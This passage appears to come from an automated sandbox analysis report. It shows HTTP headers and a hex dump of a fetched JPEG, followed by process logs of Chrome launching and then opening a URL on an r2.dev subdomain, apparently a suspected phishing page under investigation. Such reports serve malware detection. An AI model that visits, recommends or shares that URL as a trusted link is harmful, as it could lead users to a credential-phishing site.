                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:06 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:42:06 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:42:06 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:42:06 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:19:41:53
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:2
                      Start time:19:41:54
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:3
                      Start time:19:42:01
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      No disassembly